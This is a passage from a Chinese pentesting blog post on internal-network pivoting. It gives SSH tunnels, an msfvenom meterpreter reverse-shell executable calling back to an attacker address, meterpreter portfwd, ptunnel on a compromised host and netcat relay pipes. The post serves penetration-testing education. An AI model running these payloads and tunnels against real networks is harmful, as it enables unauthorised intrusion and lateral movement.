<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -R 9527:2.2.2.2:3389 -fN 0.0.0.0	#1.1.1.1</span><br><span class="line">rdesktop 127.0.0.1 9527					#0.0.0.0</span><br></pre></td></tr></table></figure>
<p>本地端口转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -L 9527:2.2.2.2:3389 -fN 1.1.1.1	#0.0.0.0</span><br><span class="line">rdesktop 127.0.0.1 9527					#0.0.0.0</span><br></pre></td></tr></table></figure>
<h3 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h3><p>要获取meterpreter会话</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f exe &gt; ~/Desktop/shell.exe</span><br><span class="line">msf &gt; use exploit/multi/handler </span><br><span class="line">msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">msf exploit(handler) &gt; set lhost 192.168.43.100</span><br><span class="line">msf exploit(handler) &gt; run</span><br></pre></td></tr></table></figure>
<p>portfwd 使用meterpreter的一个用于端口转发的模块</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; portfwd -h</span><br><span class="line">meterpreter &gt; portfwd add -l 3389 -r 2.2.2.2 -p 3389	#1.1.1.1</span><br><span class="line">meterpreter &gt; portfwd</span><br><span class="line">Active Port Forwards</span><br><span class="line">====================</span><br><span class="line">   Index  Local         Remote            Direction</span><br><span class="line">   -----  -----         ------            ---------</span><br><span class="line">   1      0.0.0.0:3389  192.168.5.5:3389  Forward</span><br><span class="line"></span><br><span class="line">rdesktop 127.0.0.1:3389									#0.0.0.0</span><br></pre></td></tr></table></figure>
<p>转发管理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">portfwd list			#列出端口转发条目</span><br><span class="line">portfwd delete -i 1		#删除id为1的端口转发</span><br><span class="line">portfwd flush			#清空所有转发</span><br></pre></td></tr></table></figure>
<blockquote>
<p>实际使用Portfwd效果可能会差，因为当数据流过大时候会将Meterpreter直接搞掉，推荐用socks代理转发。</p>
</blockquote>
<h3 id="ptunel"><a href="#ptunel" class="headerlink" title="ptunel"></a>ptunel</h3><p>需要肉鸡安装服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ptunel -x 1234</span><br><span class="line">sudo ptunel -p 1.1.1.1 -lp 2222 -da 2.2.2.2 -dp 3389 -x 1234</span><br></pre></td></tr></table></figure>
<h3 id="mknod"><a href="#mknod" class="headerlink" title="mknod"></a>mknod</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mknod backpipe p ; nc -l -p [remote port] &lt; backpipe | nc [local IP] [local port] &gt;backpipe</span><br><span class="line">mknod backpipe p ; nc -l -p 8080 &lt; backpipe | nc 10.1.1.251 80 &gt;backpipe    </span><br><span class="line">mknod backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1&gt;backpipe    # Proxy (Port 80 to 8080)</span><br><span class="line">mknod backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc localhost 80 | tee -a outflow &amp; 1&gt;backpipe    # Proxy monitor (Port 80 to 8080)</span><br></pre></td></tr></table></figure>
<p>参考链接：</p>
<p>代理转发工具汇总分析<a href="http://liehu.tass.com.cn/archives/370" target="_blank" rel="noopener">http://liehu.tass.com.cn/archives/370</a></p>
<p><a href="https://hatboy.github.io/2018/08/28/内网端口转发及穿透" target="_blank" rel="noopener">https://hatboy.github.io/2018/08/28/内网端口转发及穿透</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/内网渗透/" rel="tag"># 内网渗透</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/10/Hash破解/" rel="next" title="Hash破解">
                <i class="fa fa-chevron-left"></i> Hash破解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">EkEk</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/JeremyEkEk" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:jeremy.0394@foxmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i></a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/anbus/p/10046695.html" title="ArcticShell" target="_blank">ArcticShell</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://github.com/Micropoor/Micro8" title="Micropoor亮神" target="_blank">Micropoor亮神</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/zwjzqqb/article/list/7" title="VincentQB" target="_blank">VincentQB</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://github.com/PyxYuYu/MyBlog" title="PyxYuYu" target="_blank">PyxYuYu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://3gstudent.github.io/3gstudent.github.io/" title="三好学生" target="_blank">三好学生</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.leavesongs.com/" title="离别歌" target="_blank">离别歌</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.inksec.cn/archives/page/2/" title="阿墨" target="_blank">阿墨</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.barradell-johns.com/" title="JACK" target="_blank">JACK</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://adsecurity.org/" title="AD安全" target="_blank">AD安全</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.fuzzysecurity.com" title="FuzzySecurity" target="_blank">FuzzySecurity</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.hexacorn.com/" title="Hexacorn" target="_blank">Hexacorn</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://evi1cg.me/" title="Evi1cg" target="_blank">Evi1cg</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://b404.xyz/" title="Jirairya" target="_blank">Jirairya</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://payloads.online/" title="倾旋" target="_blank">倾旋</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://times0ng.github.io/" title="Times0g" target="_blank">Times0g</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://firstlove2016.cn/" title="初恋的技术分享" target="_blank">初恋的技术分享</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://422926799.github.io/" title="九世" target="_blank">九世</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.netwrix.com/" title="netwrix" target="_blank">netwrix</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jivoi.github.io/archive/" title="EK" target="_blank">EK</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://securityer.lofter.com/view" title="走过岁月" target="_blank">走过岁月</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.webbaozi.com/" title="baozi" target="_blank">baozi</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.myh0st.cn/" title="信安之路" target="_blank">信安之路</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jdrops.dropsec.xyz/" title="Jdrops" target="_blank">Jdrops</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://exploit.kitploit.com/" title="exploit collector" target="_blank">exploit collector</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://zjw.dropsec.xyz/" title="Hello_C" target="_blank">Hello_C</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cxsecurity.com/dorks" title="cxsecurity" target="_blank">cxsecurity</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://pentest.blog/" title="pentest" target="_blank">pentest</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://rcoil.me/" title="rcoil" target="_blank">rcoil</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://dayu.ink/" title="Dayu" target="_blank">Dayu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://04z.net/" title="04z" target="_blank">04z</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.attackdebris.com/" title="attsckdebris" target="_blank">attsckdebris</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#内网代理"><span class="nav-text">内网代理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#内网代理分类："><span class="nav-text">内网代理分类：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web代理"><span class="nav-text">Web代理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#reGeorg"><span class="nav-text">reGeorg</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#reGeorg-Proxifier"><span class="nav-text">reGeorg + Proxifier</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#reGeorg-sockscap64"><span class="nav-text">reGeorg + sockscap64</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#reGeorg-proxychains-Linux"><span class="nav-text">reGeorg + proxychains(Linux)</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#冰蝎代理-sockscap64"><span class="nav-text">冰蝎代理 + sockscap64</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#菜刀连内网数据库"><span class="nav-text">菜刀连内网数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Earthworm"><span class="nav-text">Earthworm</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#msf"><span class="nav-text">msf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH"><span class="nav-text">SSH</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#端口转发"><span class="nav-text">端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#lcx-exe"><span class="nav-text">lcx.exe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#htran-exe"><span class="nav-text">htran.exe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Fpipe"><span class="nav-text">Fpipe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Tunna"><span class="nav-text">Tunna</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssh"><span class="nav-text">ssh</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF"><span class="nav-text">MSF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ptunel"><span class="nav-text">ptunel</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mknod"><span class="nav-text">mknod</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">EkEk</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>








        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://jeremyekek-github-io.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'https://jeremyekek.github.io/2019/07/15/代理转发/';
          this.page.identifier = '2019/07/15/代理转发/';
          this.page.title = '代理转发';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://jeremyekek-github-io.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  

  

  
  

  

  

  

</body>
</html>
